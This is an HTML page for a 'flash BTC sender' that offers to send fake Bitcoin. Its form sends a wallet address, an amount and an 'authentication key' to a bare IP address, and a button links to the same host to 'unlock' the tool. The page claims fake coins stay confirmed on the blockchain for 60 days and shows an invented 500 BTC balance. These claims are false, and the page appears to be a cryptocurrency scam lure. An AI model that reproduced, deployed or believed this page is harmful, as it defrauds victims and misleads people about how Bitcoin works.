<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <link rel="icon" href="icon16.png"/>
  <title>flash BTC sender 2.1v</title>
  <meta name="description" content="Send fake btc">
  <meta name="keywords" content="flash btc, send flash btc, send fake btc">
  <meta name="author" content="Barry Gate">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
input:focus {
  background-color: #344afb;
  border-top:0px;
  color:#fff;
}
</style>

</head>



<body style="margin-top:20px; border:20px; background-color:#344afb">
<div style="text-align:center">
<fieldset>
<legend style="color:#fff;font-weight:bold;">Send Fake/Flash Bitcoins</legend>
<form method="POST"  action="http://131.153.147.162/~freigh11/sendpost">

<div><input type="text" value="Flash/Fake Bitcoin Sender" name="flash" disabled placeholder="" style="border-left:14px; width:400px; height:25px; margin-bottom:0px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:0px; font-size:14px; font-weight:bold; background-color:#344afb; color:#fff"></div>

<div><input type="text" value="Wallet Balance: 500 BTC" name="wallet"  disabled placeholder="" style="border-left:14px; width:400px; height:25px; margin-bottom:0px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:0px; font-size:14px; font-weight:bold; background-color:#344afb; color:#fff"></div>

<div><input type="text" value="Status: Locked!" name="Locked_unLocked" disabled placeholder="" style="border-left:14px; width:400px; height:25px; margin-bottom:30px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:0px; font-size:14px; font-weight:bold; background-color:#344afb; color:#fff"></div>





<div><input type="text" value="&nbsp;&nbsp;Enter Bitcoin Address" name="Bitcoin_Address" required placeholder="" style="border-left:14px; width:400px; height:40px; margin-bottom:5px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:1px; border-radius:5px; background-color:#011082; color:#fff"></div>


<div><input type="text" value="&nbsp;&nbsp;Enter Bitcoin Amount (BTC)" name="Bitcoin_Amount" required placeholder="" style="border-left:14px; width:400px; height:40px; margin-bottom:5px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:1px; border-radius:5px; background-color:#011082; color:#fff"></div>

<div><input type="text" value="&nbsp;&nbsp;Enter Authentication Key" name="Authentication_Key"   placeholder="" style="border-left:14px; width:400px; height:40px; margin-bottom:5px; border-right:0px; border-top:0px; border-bottom-style:solid; border-bottom-width:1px; border-radius:5px; background-color:#011082; color:#fff"></div>

<div style="color:#fff"><input type="radio" value="" name="network" placeholder="" style="border-left:0px; border-radius:5px; margin-bottom:5px;  margin-top:8px; background-color:#011082; color:#fff">Blockchain Main Network</div>
<div style="color:#fff"><input type="radio" value="" name="network" placeholder="" style="border-left:0px; border-radius:5px; margin-bottom:25px;  margin-top:8px; background-color:#011082; color:#fff">Blockchain Test Network</div>


<div><button type="submit" name="submit" style="border:0px; cursor:pointer; margin-bottom:30px; width:400px; height:50px; color:#fff; background-color:#011082; border-radius:10px"> Send Fake Bitcoin </button></div>

</form>



<div style="color:#fff">


Send Flash BTC to<br> your wallet and prank your friends and family.<br>
This BTC Flasher is able to <br>send Fake Bitcoin into the Blockchain network and will<br> stay confirmed for 60 days.<br>
Click on Unlock Wallet Button <br>and start sending BTC.


</div>



<div><a href="http://131.153.147.162/~freigh11/sendpost" style="cursor:pointer"><button style="border:0px; cursor:pointer; margin-top:30px; width:400px; height:50px; color:#fff; background-color:#546084; border-radius:10px"> Unlock and Get Authentication Key </button></a></div>

</fieldset>
</div>

</body>















</html>